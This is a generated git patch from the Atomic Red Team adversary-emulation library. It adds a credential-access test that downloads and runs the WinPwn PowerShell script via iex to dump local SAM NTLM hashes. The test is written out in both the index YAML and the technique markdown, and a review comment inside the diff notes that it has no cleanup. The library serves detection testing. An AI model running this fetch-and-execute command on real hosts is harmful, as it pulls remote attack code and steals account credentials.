From 812f7dcbaac07b2059933db8eecebde8151a51fc Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Fri, 13 May 2022 01:56:04 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 11 +++++++
 atomics/T1003.002/T1003.002.md | 32 +++++++++++++++++++
 6 files changed, 47 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 29121a05..9f0383a8 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -131,6 +131,7 @@ credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90
 credential-access,T1003.002,Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
 credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
 credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
+credential-access,T1003.002,Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
 credential-access,T1558.002,Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 79b2b564..504e7e7b 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -94,6 +94,7 @@ credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90
 credential-access,T1003.002,Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
 credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
 credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
+credential-access,T1003.002,Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
 credential-access,T1558.002,Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index a3e52c6c..97cc2d34 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -177,6 +177,7 @@
 - Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
 - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
 - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
+ - Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
 - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1558.002 Silver Ticket](../../T1558.002/T1558.002.md)
 - Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 9d5104c8..243a9c97 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -132,6 +132,7 @@
 - Atomic Test #4: PowerDump Hashes and Usernames from Registry [windows]
 - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
 - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
+ - Atomic Test #7: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes [windows]
 - [T1558.002 Silver Ticket](../../T1558.002/T1558.002.md)
 - Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
 - [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 1d214799..254fc496 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -7100,6 +7100,17 @@ credential-access:
 cleanup_command: |
 $toremove = #{dump_path} + "\" + '#{dumped_hive}'
 rm $toremove -ErrorAction Ignore
+ - name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
+ auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
+ description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique
+ via function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
+ net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
+ -consoleoutput -noninteractive "
+ name: powershell
 T1555.002:
 technique:
 object_marking_refs:
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index 7f5572e5..f9ddff47 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -36,6 +36,8 @@ Notes:
 - [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
+- [Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7---winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
+
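Review bot: The new index entry for auto_generated_guid 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb defines only `executor:` and no `cleanup_command`, whereas the preceding T1003.002 test in the same hunk ends with a `cleanup_command` block, so anything this test leaves on the host has no recorded reversal. The executor assigns `$S3cur3Th1sSh1t_repo` but the two statements that follow never reference it, which looks like a leftover from the upstream script rather than an intentional setting. The download is pinned to commit `121dcee26a7aca368821563cbe92b2b5638c5773`, which fixes the fetched content, but the entry records no expected hash of WinPwn.ps1 and the description does not say that the script is fetched at run time and executed in-process; a `description:` such as `Downloads WinPwn.ps1 from a pinned upstream commit and executes it in-process via iex; no cleanup is defined` would make that explicit to anyone scheduling the index. Because this file is generated, the fix belongs in the technique's source atomic definition, which is outside this patch.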
@@ -310,4 +312,34 @@ rm $toremove -ErrorAction Ignore
+
+
+
+## Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
+Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+samfile -consoleoutput -noninteractive
+```
+
+
+
+
+